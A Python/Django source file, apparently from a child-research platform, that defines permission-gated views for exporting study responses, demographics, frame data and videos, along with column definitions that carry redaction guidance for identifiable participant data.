cleaned_data = self.build_summary_dict_csv(header_options)
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-responses-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyChildrenCSV(ResponseDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads a summary of all children who participated in CSV format.
"""
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
child_list = []
session_list = []
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = flatten_dict(
{
col.id: col.extractor(resp)
for col in RESPONSE_COLUMNS
if col.id in CHILD_CSV_HEADERS
}
)
if row_data["child__global_id"] not in child_list:
child_list.append(row_data["child__global_id"])
session_list.append(row_data)
output, writer = csv_dict_output_and_writer(CHILD_CSV_HEADERS)
writer.writerows(session_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-children-identifiable"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyChildrenDictCSV(CanViewStudyResponsesMixin, View):
"""
Hitting this URL downloads a data dictionary in CSV format for the summary of children who participated.
Does not depend on actual response data.
TODO: separate from response data mixin
"""
def build_child_dict_csv(self):
"""
Builds CSV file contents for data dictionary for overview of all child participants
"""
all_descriptions = [
{"column": col.id, "description": col.description}
for col in RESPONSE_COLUMNS
if col.id in CHILD_CSV_HEADERS
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
return output.getvalue()
def get(self, request, *args, **kwargs):
study = self.study
cleaned_data = self.build_child_dict_csv()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-children-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponsesFrameDataCSV(ResponseDownloadMixin, generic.list.ListView):
"""Hitting this URL downloads a ZIP file with frame data from one response per file in CSV format"""
# TODO: with large files / many responses generation can take a while. Should generate asynchronously along
# with the data dict.
def render_to_response(self, context, **response_kwargs):
paginator = context["paginator"]
study = self.study
if study.study_type.is_external:
messages.error(
self.request, "Frame data is not available for External Studies."
)
return redirect(reverse("exp:study-responses-all", kwargs={"pk": study.pk}))
zipped_file = io.BytesIO() # import io
with zipfile.ZipFile(zipped_file, "w", zipfile.ZIP_DEFLATED) as zipped:
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
data = build_single_response_framedata_csv(resp)
filename = "{}_{}_{}.csv".format(
study_name_for_files(study.name), resp.uuid, "frames"
)
zipped.writestr(filename, data)
zipped_file.seek(0)
response = FileResponse(
zipped_file,
as_attachment=True,
filename="{}_framedata_per_session.zip".format(
study_name_for_files(study.name)
),
)
return response
class StudyResponsesFrameDataDictCSV(ResponseDownloadMixin, View):
"""
Hitting this URL queues creation of a template data dictionary for frame-level data in CSV format.
The file is put on GCP and a link is emailed to the user.
"""
def get(self, request, *args, **kwargs):
study = self.study
if study.study_type.is_external:
messages.error(
request, "Frame data dictionary is not available for external studies"
)
else:
filename = "{}_{}_{}".format(
study_name_for_files(study.name), study.uuid, "all-frames-dict"
)
build_framedata_dict.delay(filename, study.uuid, self.request.user.uuid)
messages.success(
request,
f"A frame data dictionary for {study.name} is being generated. You will be emailed a link when it's completed.",
)
return HttpResponseRedirect(
reverse("exp:study-responses-all", kwargs=self.kwargs)
)
class StudyDemographics(
CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
"""
StudyDemographics view shows participant demographic snapshots associated
with each response to the study
"""
template_name = "studies/study_demographics.html"
queryset = Study.objects.all()
def get_context_data(self, **kwargs):
"""
Adds information for displaying how many and which types of responses are available.
"""
context = super().get_context_data(**kwargs)
context["n_responses"] = (
context["study"].responses_for_researcher(self.request.user).count()
)
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
return context
class StudyDemographicsJSON(DemographicDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads all participant demographics in JSON format.
"""
def render_to_response(self, context, **response_kwargs):
study = self.study
header_options = self.request.GET.getlist("demo_options")
json_responses = []
paginator = context["paginator"]
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
json_responses.append(
json.dumps(
construct_response_dictionary(
resp,
DEMOGRAPHIC_COLUMNS,
header_options,
include_exp_data=False,
),
indent="\t",
default=str,
)
)
cleaned_data = f"[ {', '.join(json_responses)} ]"
filename = "{}_{}.json".format(
study_name_for_files(study.name), "all-demographic-snapshots"
)
response = HttpResponse(cleaned_data, content_type="text/json")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyDemographicsCSV(DemographicDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads all participant demographics in CSV format.
"""
def render_to_response(self, context, **response_kwargs):
study = self.study
paginator = context["paginator"]
header_options = set(self.request.GET.getlist("demo_options"))
participant_list = []
headers_for_download = get_demographic_headers(header_options)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
row_data = {col.id: col.extractor(resp) for col in DEMOGRAPHIC_COLUMNS}
participant_list.append(row_data)
output, writer = csv_dict_output_and_writer(headers_for_download)
writer.writerows(participant_list)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(study.name), "all-demographic-snapshots"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyDemographicsDictCSV(DemographicDownloadMixin, generic.list.ListView):
"""
Hitting this URL downloads a data dictionary for participant demographics in in CSV format.
Does not depend on any actual data.
"""
def render_to_response(self, context, **response_kwargs):
header_options = set(self.request.GET.getlist("demo_options"))
headers_for_download = get_demographic_headers(header_options)
all_descriptions = [
{"column": col.id, "description": col.description}
for col in DEMOGRAPHIC_COLUMNS
if col.id in headers_for_download
]
output, writer = csv_dict_output_and_writer(["column", "description"])
writer.writerows(all_descriptions)
cleaned_data = output.getvalue()
filename = "{}_{}.csv".format(
study_name_for_files(self.study.name), "all-demographic-snapshots-dict"
)
response = HttpResponse(cleaned_data, content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyCollisionCheck(ResponseDownloadMixin, View):
"""
Hitting this URL checks for collisions among all child and account hashed IDs, and returns a string describing
any collisions (empty string if none).
"""
def get(self, request, *args, **kwargs):
study = self.study
responses = (
study.consented_responses.order_by("id")
.select_related("child", "child__user", "study")
.values(
"uuid",
"child__uuid",
"child__user__uuid",
"study__uuid",
"study__salt",
"study__hash_digits",
)
)
child_dict = {}
account_dict = {}
collision_text = ""
# Note: could also just check number of unique global vs. hashed IDs in full dataset;
# only checking one-by-one for more informative output.
paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for resp in page_of_responses:
participant_hashed_id = hash_participant_id(resp)
participant_global_id = resp["child__user__uuid"]
child_hashed_id = hash_child_id(resp)
child_global_id = resp["child__uuid"]
if participant_hashed_id in account_dict:
if participant_global_id != account_dict[participant_hashed_id]:
collision_text += "Participant hashed ID {} ({}, {})\n".format(
participant_hashed_id,
account_dict[participant_hashed_id],
participant_global_id,
)
else:
account_dict[participant_hashed_id] = participant_global_id
if child_hashed_id in child_dict:
if child_global_id != child_dict[child_hashed_id]:
collision_text += "Child hashed ID {} ({}, {})<br>".format(
child_hashed_id,
child_dict[child_hashed_id],
child_global_id,
)
else:
child_dict[child_hashed_id] = child_global_id
return JsonResponse({"collisions": collision_text})
class StudyAttachments(CanViewStudyResponsesMixin, generic.ListView):
"""
StudyAttachments View shows video attachments for the study
"""
template_name = "studies/study_attachments.html"
model = Video
paginate_by = 100
def get_ordering(self):
return self.request.GET.get("sort", "-created_at") or "-created_at"
def get_queryset(self):
"""Fetches all consented videos this user has access to.
Returns:
QuerySet: all videos from this study where response has been marked as
consented and response is of a type (preview/actual data) that user can view
Todo:
* use a helper (e.g. in queries) select_videos_for_user to fetch the
appropriate videos here and in build_zipfile_of_videos - deferring for the moment
to work out dependencies.
"""
study = self.study
videos = study.videos_for_consented_responses
if not self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, study
):
videos = videos.filter(response__is_preview=True)
if not self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, study
):
videos = videos.filter(response__is_preview=False)
match = self.request.GET.get("match", "")
if match:
videos = videos.filter(full_name__icontains=match)
return videos.order_by(self.get_ordering())
def get_context_data(self, **kwargs):
"""
In addition to the study, adds several items to the context dictionary. Study results
are paginated.
"""
context = super().get_context_data(**kwargs)
context["match"] = self.request.GET.get("match", "")
context["study"] = self.study
return context
def post(self, request, *args, **kwargs):
"""
Downloads study video
"""
match = self.request.GET.get("match", "")
study = self.study
if self.request.POST.get("all-attachments"):
build_zipfile_of_videos.delay(
f"{study.uuid}_videos",
study.uuid,
match,
self.request.user.uuid,
consent_only=False,
)
messages.success(
request,
f"An archive of videos for {study.name} is being generated. You will be emailed a link when it's completed.",
)
if self.request.POST.get("all-consent-videos"):
build_zipfile_of_videos.delay(
f"{study.uuid}_consent_videos",
study.uuid,
match,
self.request.user.uuid,
consent_only=True,
)
messages.success(
request,
f"An archive of consent videos for {study.name} is being generated. You will be emailed a link when it's completed.",
)
return HttpResponseRedirect(
reverse("exp:study-attachments", kwargs=self.kwargs)
)
| 40.529175 | 135 | 0.624957 | import io
import json
import zipfile
from functools import cached_property
from typing import Callable, Dict, KeysView, List, NamedTuple, Set, Union
import requests
from django.contrib import messages
from django.contrib.auth.mixins import UserPassesTestMixin
from django.core.exceptions import ObjectDoesNotExist, SuspiciousOperation
from django.core.files import File
from django.core.paginator import Paginator
from django.db.models import Prefetch
from django.http import (
FileResponse,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
StreamingHttpResponse,
)
from django.shortcuts import redirect, reverse
from django.views import generic
from django.views.generic.base import View
from django.views.generic.detail import SingleObjectMixin
from django.views.generic.list import MultipleObjectMixin
from accounts.utils import (
hash_child_id,
hash_demographic_id,
hash_id,
hash_participant_id,
)
from exp.utils import (
RESPONSE_PAGE_SIZE,
csv_dict_output_and_writer,
csv_namedtuple_writer,
flatten_dict,
round_age,
round_ages_from_birthdays,
study_name_for_files,
)
from exp.views.mixins import (
CanViewStudyResponsesMixin,
ResearcherLoginRequiredMixin,
SingleObjectFetchProtocol,
StudyLookupMixin,
)
from studies.models import Feedback, Response, Study, Video
from studies.permissions import StudyPermission
from studies.queries import (
get_consent_statistics,
get_responses_with_current_rulings_and_videos,
)
from studies.tasks import build_framedata_dict, build_zipfile_of_videos
class ResponseDataColumn(NamedTuple):
id: str
description: str
extractor: Callable[
[Union[Response, Dict]], Union[str, List]
]
optional: bool = False
name: str = ""
include_by_default: bool = False
identifiable: bool = False
RESPONSE_COLUMNS = [
ResponseDataColumn(
id="response__id",
description="Short ID for this response",
extractor=lambda resp: str(resp.id),
name="Response ID",
),
ResponseDataColumn(
id="response__uuid",
description="Unique identifier for response. Can be used to match data to video filenames.",
extractor=lambda resp: str(resp.uuid),
name="Response UUID",
),
ResponseDataColumn(
id="response__date_created",
description="Timestamp for when participant began session, in format e.g. 2019-11-07 17:13:38.702958+00:00",
extractor=lambda resp: str(resp.date_created),
name="Date created",
),
ResponseDataColumn(
id="response__completed",
description=(
"Whether the participant submitted the exit survey; depending on study criteria, this may not align "
"with whether the session is considered complete. E.g., participant may have left early but submitted "
"exit survey, or may have completed all test trials but not exit survey."
),
extractor=lambda resp: resp.completed,
name="Completed",
),
ResponseDataColumn(
id="response__withdrawn",
description=(
"Whether the participant withdrew permission for viewing/use of study video beyond consent video. If "
"true, video will not be available and must not be used."
),
extractor=lambda resp: resp.withdrawn,
name="Withdrawn",
),
ResponseDataColumn(
id="response__parent_feedback",
description=(
"Freeform parent feedback entered into the exit survey, if any. This field may incidentally contain "
"identifying or sensitive information depending on what parents say, so it should be scrubbed or "
"omitted from published data."
),
extractor=lambda resp: resp.parent_feedback,
name="Parent feedback",
),
ResponseDataColumn(
id="response__birthdate_difference",
description=(
"Difference between birthdate entered in exit survey, if any, and birthdate of registered child "
"participating. Positive values mean that the birthdate from the exit survey is LATER. Blank if "
"no birthdate available from the exit survey."
),
extractor=lambda resp: resp.birthdate_difference,
name="Birthdate difference",
),
ResponseDataColumn(
id="response__video_privacy",
description=(
"Privacy level for videos selected during the exit survey, if the parent completed the exit survey. "
"Possible levels are 'private' (only people listed on your IRB protocol can view), 'scientific' "
"(can share for scientific/educational purposes), and 'public' (can also share for publicity). "
"In no cases may videos be shared for commercial purposes. If this is missing (e.g., family stopped "
"just after the consent form and did not complete the exit survey), you must treat the video as "
"private."
),
extractor=lambda resp: resp.privacy,
name="Video privacy level",
),
ResponseDataColumn(
id="response__databrary",
description=(
"Whether the parent agreed to share video data on Databrary - 'yes' or 'no'. If missing, you must "
"treat the video as if 'no' were selected. If 'yes', the video privacy selections also apply to "
"authorized Databrary users."
),
extractor=lambda resp: resp.databrary,
name="Databrary sharing",
),
ResponseDataColumn(
id="response__is_preview",
description=(
"Whether this response was generated by a researcher previewing the experiment. Preview data should "
"not be used in any actual analyses."
),
extractor=lambda resp: resp.is_preview,
name="Preview",
),
ResponseDataColumn(
id="consent__ruling",
description=(
"Most recent consent video ruling: one of 'accepted' (consent has been reviewed and judged to indidate "
"informed consent), 'rejected' (consent has been reviewed and judged not to indicate informed "
"consent -- e.g., video missing or parent did not read statement), or 'pending' (no current judgement, "
"e.g. has not been reviewed yet or waiting on parent email response')"
),
extractor=lambda resp: resp.most_recent_ruling,
),
ResponseDataColumn(
id="consent__arbiter",
description="Name associated with researcher account that made the most recent consent ruling",
extractor=lambda resp: resp.most_recent_ruling_arbiter,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="consent__comment",
description=(
"Comment associated with most recent consent ruling (may be used to track e.g. any cases where consent "
"was confirmed by email)"
),
extractor=lambda resp: resp.most_recent_ruling_comment,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="study__uuid",
description="Unique identifier of study associated with this response. Same for all responses to a given Lookit study.",
extractor=lambda resp: str(resp.study.uuid),
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, which "
"may have unintended privacy consequences. Researchers can use this ID to match participants across "
"studies (subject to their own IRB review), but would need to generate their own random participant "
"IDs for publication in that case. Use participant_hashed_id as a publication-safe alternative if "
"only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp.child.user.uuid),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple responses "
"from a child and for siblings, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.user.uuid,
resp.study.uuid,
resp.study.salt,
resp.study.hash_digits,
),
name="Parent ID",
),
ResponseDataColumn(
id="participant__nickname",
description=(
"Nickname associated with the family account for this response - generally the mom or dad's name. "
"Must be redacted for publication."
),
extractor=lambda resp: resp.child.user.nickname,
optional=True,
name="Parent name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__global_id",
description=(
"Primary unique identifier for the child associated with this response. Will be the same for multiple "
"responses from one child, even across different Lookit studies. MUST BE REDACTED FOR PUBLICATION "
"because this allows identification of children across different published studies, which may have "
"unintended privacy consequences. Researchers can use this ID to match participants across studies "
"(subject to their own IRB review), but would need to generate their own random participant IDs for "
"publication in that case. Use child_hashed_id as a publication-safe alternative if only analyzing "
"data from one Lookit study."
),
extractor=lambda resp: str(resp.child.uuid),
optional=True,
name="Child global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__hashed_id",
description=(
"Identifier for child associated with this response. Will be the same for multiple responses from a "
"child, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.uuid, resp.study.uuid, resp.study.salt, resp.study.hash_digits
),
name="Child ID",
),
ResponseDataColumn(
id="child__name",
description=(
"Nickname for the child associated with this response. Not necessarily a real name (we encourage "
"initials, nicknames, etc. if parents aren't comfortable providing a name) but must be redacted for "
"publication of data."
),
extractor=lambda resp: resp.child.given_name,
optional=True,
name="Child name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__birthday",
description=(
"Birthdate of child associated with this response. Must be redacted for publication of data (switch to "
"age at time of participation; either use rounded age, jitter the age, or redact timestamps of "
"participation)."
),
extractor=lambda resp: resp.child.birthday,
optional=True,
name="Birthdate",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_in_days",
description=(
"Age in days at time of response of child associated with this response, exact. This can be used in "
"conjunction with timestamps to calculate the child's birthdate, so must be jittered or redacted prior "
"to publication unless no timestamp information is shared."
),
extractor=lambda resp: (resp.date_created.date() - resp.child.birthday).days,
optional=True,
name="Age in days",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_rounded",
description=(
"Age in days at time of response of child associated with this response, rounded to the nearest 10 "
"days if under 1 year old and to the nearest 30 days if over 1 year old. May be published; however, if "
"you have more than a few sessions per participant it would be possible to infer the exact age in days "
"(and therefore birthdate) with some effort. In this case you might consider directly jittering "
"birthdates."
),
extractor=lambda resp: str(
round_age(int((resp.date_created.date() - resp.child.birthday).days))
)
if (resp.date_created and resp.child.birthday)
else "",
optional=True,
name="Rounded age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__gender",
description=(
"Parent-identified gender of child, one of 'm' (male), 'f' (female), 'o' (other), or 'na' (prefer not "
"to answer)"
),
extractor=lambda resp: resp.child.gender,
optional=True,
name="Child gender",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__age_at_birth",
description=(
"Gestational age at birth in weeks. One of '40 or more weeks', '39 weeks' through '24 weeks', "
"'Under 24 weeks', or 'Not sure or prefer not to answer'"
),
extractor=lambda resp: resp.child.age_at_birth,
optional=True,
name="Child gestational age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__language_list",
description="List of languages spoken (using language codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.language_list,
optional=True,
name="Child languages",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__condition_list",
description="List of child characteristics (using condition/characteristic codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.condition_list,
optional=True,
name="Child conditions",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__additional_information",
description=(
"Free response 'anything else you'd like us to know' field on child registration form for child "
"associated with this response. Should be redacted or reviewed prior to publication as it may include "
"names or other identifying information."
),
extractor=lambda resp: resp.child.additional_information,
optional=True,
name="Child additional information",
include_by_default=True,
identifiable=True,
),
ResponseDataColumn(
id="response__sequence",
description=(
"Each response_sequence.N field (response_sequence.0, response_sequence.1, etc.) gives the ID of the "
"Nth frame displayed during the session associated with this response. Responses may have different "
"sequences due to randomization or if a participant leaves early."
),
extractor=lambda resp: resp.sequence,
name="Response sequence",
),
ResponseDataColumn(
id="response__conditions",
description=(
"RESEARCHERS: EXPAND THIS SECTION BASED ON YOUR INDIVIDUAL STUDY. Each set of "
"response_conditions.N.(...) fields give information about condition assignment during a particular "
"frame of this study. response_conditions.0.frameName is the frame ID (corresponding to a value in "
"response_sequence) where the randomization occurred. Additional fields such as "
"response_conditions.0.conditionNum depend on the specific randomizer frames used in this study."
),
extractor=lambda resp: [
{**{"frameName": cond_frame}, **conds}
for (cond_frame, conds) in resp.conditions.items()
],
),
]
# Columns for demographic data downloads. Extractor functions expect Response values dict,
# rather than instance.
DEMOGRAPHIC_COLUMNS = [
ResponseDataColumn(
id="response__uuid",
description=(
"Primary unique identifier for response. Can be used to match demographic data to response data "
"and video filenames; must be redacted prior to publication if videos are also published."
),
extractor=lambda resp: str(resp["uuid"]),
name="Response UUID",
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, "
"which may have unintended privacy consequences. Researchers can use this ID to match participants "
"across studies (subject to their own IRB review), but would need to generate their own random "
"participant IDs for publication in that case. Use participant__hashed_id as a publication-safe "
"alternative if only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp["child__user__uuid"]),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, but is unique to this study. This may be published "
"directly."
),
extractor=lambda resp: hash_participant_id(resp),
name="Participant ID",
),
ResponseDataColumn(
id="demographic__hashed_id",
description=(
"Identifier for this demographic snapshot. Changes upon updates to the demographic form, "
"so may vary within the same participant across responses."
),
extractor=lambda resp: hash_demographic_id(resp),
name="Demographic ID",
),
ResponseDataColumn(
id="demographic__date_created",
description=(
"Timestamp of creation of the demographic snapshot associated with this response, in format e.g. "
"2019-10-02 21:39:03.713283+00:00"
),
extractor=lambda resp: str(resp["demographic_snapshot__created_at"]),
name="Date created",
),
ResponseDataColumn(
id="demographic__number_of_children",
description="Response to 'How many children do you have?'; options 0-10 or >10 (More than 10)",
extractor=lambda resp: resp["demographic_snapshot__number_of_children"],
name="Number of children",
),
ResponseDataColumn(
id="demographic__child_rounded_ages",
description=(
"List of rounded ages based on child birthdays entered in demographic form (not based on children "
"registered). Ages are at time of response for this row, in days, rounded to nearest 10 for ages "
"under 1 year and nearest 30 otherwise. In format e.g. [60, 390]"
),
extractor=lambda resp: round_ages_from_birthdays(
resp["demographic_snapshot__child_birthdays"], resp["date_created"]
),
name="Child ages rounded",
),
ResponseDataColumn(
id="demographic__languages_spoken_at_home",
description="Freeform response to 'What language(s) does your family speak at home?'",
extractor=lambda resp: resp["demographic_snapshot__languages_spoken_at_home"],
name="Languages spoken at home",
),
ResponseDataColumn(
id="demographic__number_of_guardians",
description="Response to 'How many parents/guardians do your children live with?' - 1, 2, 3> [3 or more], varies",
extractor=lambda resp: resp["demographic_snapshot__number_of_guardians"],
name="Number of guardians",
),
ResponseDataColumn(
id="demographic__number_of_guardians_explanation",
description=(
"Freeform response to 'If the answer varies due to shared custody arrangements or travel, please "
"enter the number of parents/guardians your children are usually living with or explain.'"
),
extractor=lambda resp: resp[
"demographic_snapshot__number_of_guardians_explanation"
],
name="Number of guardians explanation",
),
ResponseDataColumn(
id="demographic__race_identification",
description=(
"Comma-separated list of all values checked for question 'What category(ies) does your family "
"identify as?', from list: White; Hispanic, Latino, or Spanish origin; Black or African American; "
"Asian; American Indian or Alaska Native; Middle Eastern or North African; Native Hawaiian or "
"Other Pacific Islander; Another race, ethnicity, or origin"
),
extractor=lambda resp: resp["demographic_snapshot__race_identification"],
name="Race",
),
ResponseDataColumn(
id="demographic__parent_age",
description=(
"Parent's response to question 'What is your age?'; options are <18, 18-21, 22-24, 25-29, 30-34, "
"35-39, 40-44, 45-49, 50s, 60s, >70"
),
extractor=lambda resp: resp["demographic_snapshot__age"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__parent_gender",
description=(
"Parent's response to question 'What is your gender?'; options are m [male], f [female], o "
"[other], na [prefer not to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__gender"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__education_level",
description=(
"Parent's response to question 'What is the highest level of education you've completed?'; options "
"are some [some or attending high school], hs [high school diploma or GED], col [some or attending "
"college], assoc [2-year college degree], bach [4-year college degree], grad [some or attending "
"graduate or professional school], prof [graduate or professional degree]"
),
extractor=lambda resp: resp["demographic_snapshot__education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__spouse_education_level",
description=(
"Parent's response to question 'What is the highest level of education your spouse has "
"completed?'; options are some [some or attending high school], hs [high school diploma or GED], "
"col [some or attending college], assoc [2-year college degree], bach [4-year college degree], "
"grad [some or attending graduate or professional school], prof [graduate or professional degree], "
"na [not applicable - no spouse or partner]"
),
extractor=lambda resp: resp["demographic_snapshot__spouse_education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__annual_income",
description=(
"Parent's response to question 'What is your approximate family yearly income (in US dollars)?'; "
"options are 0, 5000, 10000, 15000, 20000-19000 in increments of 10000, >200000, or na [prefer not "
"to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__annual_income"],
name="Annual income",
),
ResponseDataColumn(
id="demographic__number_of_books",
description="Parent's response to question 'About how many children's books are there in your home?'; integer",
extractor=lambda resp: resp["demographic_snapshot__number_of_books"],
name="Number of books",
),
ResponseDataColumn(
id="demographic__additional_comments",
description="Parent's freeform response to question 'Anything else you'd like us to know?'",
extractor=lambda resp: resp["demographic_snapshot__additional_comments"],
name="Additional comments",
),
ResponseDataColumn(
id="demographic__country",
description="Parent's response to question 'What country do you live in?'; 2-letter country code",
extractor=lambda resp: resp["demographic_snapshot__country"],
name="Country code",
),
ResponseDataColumn(
id="demographic__state",
description=(
"Parent's response to question 'What state do you live in?' if country is US; 2-letter state "
"abbreviation"
),
extractor=lambda resp: resp["demographic_snapshot__state"],
name="US State",
),
ResponseDataColumn(
id="demographic__density",
description=(
"Parent's response to question 'How would you describe the area where you live?'; options are "
"urban, suburban, rural"
),
extractor=lambda resp: resp["demographic_snapshot__density"],
name="Density",
),
ResponseDataColumn(
id="demographic__lookit_referrer",
description="Parent's freeform response to question 'How did you hear about Lookit?'",
extractor=lambda resp: resp["demographic_snapshot__lookit_referrer"],
name="How you heard about Lookit",
),
]
# Which headers from the response data summary should go in the child data downloads
CHILD_CSV_HEADERS = [
col.id
for col in RESPONSE_COLUMNS
if col.id.startswith("child__") or col.id.startswith("participant__")
]
IDENTIFIABLE_DATA_HEADERS = {col.id for col in RESPONSE_COLUMNS if col.identifiable}
def get_response_headers(
selected_header_ids: Union[Set, List],
all_available_header_ids: Union[Set, KeysView],
) -> List:
unselected_optional_ids = {
col.id
for col in RESPONSE_COLUMNS
if col.optional and col.id not in selected_header_ids
}
selected_standard_header_ids = [
col.id
for col in RESPONSE_COLUMNS[0:-2]
if col.id not in unselected_optional_ids
]
return selected_standard_header_ids + sorted(
list(
all_available_header_ids
- set(selected_standard_header_ids)
- unselected_optional_ids
)
)
def get_demographic_headers(selected_header_ids=None) -> List[str]:
if selected_header_ids is None:
selected_header_ids = {}
return [
col.id
for col in DEMOGRAPHIC_COLUMNS
if col.id in selected_header_ids or not col.optional
]
def construct_response_dictionary(
resp, columns, optional_headers, include_exp_data=True
):
if optional_headers is None:
optional_headers = {}
resp_dict = {}
for col in columns:
if col.id in optional_headers or not col.optional:
try:
object_name, field_name = col.id.split("__")
if object_name in resp_dict:
resp_dict[object_name][field_name] = col.extractor(resp)
else:
resp_dict[object_name] = {field_name: col.extractor(resp)}
except ValueError:
resp_dict[col.id] = col.extractor(resp)
# Include exp_data field in dictionary?
if include_exp_data:
resp_dict["exp_data"] = resp.exp_data
return resp_dict
class FrameDataRow(NamedTuple):
response_uuid: str
child_hashed_id: str
frame_id: str
event_number: str
key: str
value: str
FRAME_DATA_HEADER_DESCRIPTIONS = {
"response_uuid": "Unique identifier for this response; can be matched to summary data and video filenames",
"child_hashed_id": (
"Hashed identifier for the child associated with this response; can be matched to summary data "
"child_hashed_id. This random ID may be published directly; it is specific to this study. If you "
"need to match children across multiple studies, use the child_global_id."
),
"frame_id": (
"Identifier for the particular frame responsible for this data; matches up to an element in the "
"response_sequence in the summary data file"
),
"event_number": (
"Index of the event responsible for this data, if this is an event. Indexes start from 0 within each "
"frame (and within global data) within each response. Blank for non-event data."
),
"key": "Label for a piece of data collected during this frame - for example, 'formData.child_favorite_animal'",
"value": "Value of the data associated with this key (of the indexed event if applicable) - for example, 'giraffe'",
}
def get_frame_data(resp: Union[Response, Dict]) -> List[FrameDataRow]:
if type(resp) is not dict:
resp = {
"child__uuid": resp.child.uuid,
"study__uuid": resp.study.uuid,
"study__salt": resp.study.salt,
"study__hash_digits": resp.study.hash_digits,
"uuid": resp.uuid,
"exp_data": resp.exp_data,
"global_event_timings": resp.global_event_timings,
}
frame_data_tuples = []
child_hashed_id = hash_id(
resp["child__uuid"],
resp["study__uuid"],
resp["study__salt"],
resp["study__hash_digits"],
)
# First add all of the global event timings as events with frame_id "global"
for (iEvent, event) in enumerate(resp["global_event_timings"]):
for (key, value) in event.items():
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id="global",
key=key,
event_number=str(iEvent),
value=value,
)
)
# Next add all data in exp_data
event_prefix = "eventTimings."
for frame_id, frame_data in resp["exp_data"].items():
for (key, value) in flatten_dict(frame_data).items():
# Process event data separately and include event_number within frame
if key.startswith(event_prefix):
key_pieces = key.split(".")
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id=frame_id,
key=".".join(key_pieces[2:]),
event_number=str(key_pieces[1]),
value=value,
)
)
# omit frameType values from CSV
elif key == "frameType":
continue
# Omit the DOB from any exit survey
